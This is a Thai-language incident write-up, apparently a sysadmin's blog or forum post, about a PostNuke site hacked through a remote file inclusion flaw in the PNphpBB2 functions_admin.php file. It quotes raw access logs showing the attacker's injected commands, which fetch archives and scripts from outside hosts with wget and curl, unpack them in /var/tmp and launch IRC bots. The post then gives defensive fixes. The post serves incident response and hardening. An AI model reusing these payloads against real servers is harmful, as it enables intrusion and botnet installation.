เว็บลูกค้าโดน hack ผ่าน PHPBB2 ที่อยู่ใน PostNuke วันนี้เห็นกับตาตัวเองครับ (แปลกที่ยังรันใน /tmp ได้ ทั้งที่ตรวจดูเห็นว่า mount noexec แล้ว แต่ไม่เป็นไร เดี๋ยวดูอีกที)
เรื่องมีอยู่ว่านี่ครับ
[SIZE=1]
cdomain.com:202.95.157.153 - - [31/May/2005:07:23:49 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;ls%20-la HTTP/1.0" 200 64632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:24:18 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./dssl%20b.txt HTTP/1.0" 200 1247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:25:18 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;wget%20http://www.novadesign.com/exoops/modules/headlines/cache/banners/stelkers.zip HTTP/1.0" 200 1246 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:25:34 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;curl%20-o%20stelkers.zip%20novadesign.com/exoops/modules/headlines/cache/banners/stelkers.zip HTTP/1.0" 200 1842 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:25:45 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;tar%20-zxvf%20stelkers.zip HTTP/1.0" 200 5732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:25:54 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers/scripts;rm%20-rf%20ary.tcl HTTP/1.0" 200 1209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:26:05 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers/scripts;curl%20-o%20ary.tcl%20daengiwan.info/tcl/ary.tcl HTTP/1.0" 200 1763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:26:13 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers HTTP/1.0" 200 1209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:26:29 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=/sbin/ifconfig%20|%20grep%20inet HTTP/1.0" 200 1468 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:27:26 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./make%20a1.txt%20erixronta%20erixz%20203.146.102.101%20menado%20ohara HTTP/1.0" 200 1595 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:27:34 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./dssl%20a1.txt HTTP/1.0" 200 2741 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:28:10 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./make%20a2.txt%20nerfaz%20ceffe%20203.146.102.114%20menado%20ohara HTTP/1.0" 200 1592 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:28:34 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./dssl%20a2.txt HTTP/1.0" 200 2734 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:31:37 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./make%20a3.txt%20amiesa%20morea%20203.146.102.98%20menado%20ohara HTTP/1.0" 200 1590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:31:45 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers;./dssl%20a3.txt HTTP/1.0" 200 2734 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:34:03 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers/scripts;./autobotchk%20a1.txt HTTP/1.0" 200 1986 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:34:09 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers/scripts;./autobotchk%20a2.txt HTTP/1.0" 200 1971 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
cdomain.com:202.95.157.153 - - [31/May/2005:07:34:14 +0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/bereeek/e.txt?&cmd=uname%20-a;id;cd%20/var/tmp;cd%20.stelkers/scripts;./autobotchk%20a3.txt HTTP/1.0" 200 1971 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
[/SIZE]
และเขาก็จะมารัน irc bot ในเครื่องได้สบายใจเฉิ่ม (เพราะ exec /tmp ได้ – ซึ่งเดี๋ยวทางเราต้องเช็คอีกที)
ไฟล์ที่เป็นปัญหาคือไฟล์นี้
modules/PNphpBB2/includes/functions_admin.php
การแก้ไข ลบบรรทัดนี้ออก
// Begin PNphpBB2 Categories Hierarchie Mod
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );
// End PNphpBB2 Categories Hierarchie Mod
ลองตรวจดูว่า /tmp หรือ /var/tmp หรือ อะไรเทือกนั้น ของท่าน mount noexec และตรวจหาไฟล์ modules/PNphpBB2/includes/functions_admin.php ของลูกค้านะครับ และจะให้ดี chmod o-rx /usr/bin/make รวมถึงพวก compiler ต่าง
ๆ ด้วย
IP ที่เจาะเข้ามานี้ 202.95.157.153 ดูเหมือนจะมาจาก .id (indo?) ไม่รู้โดน hack มาก่อน หรือ ตัวจริงเสียงจริง ไว้วันหลังจะไปทักทาย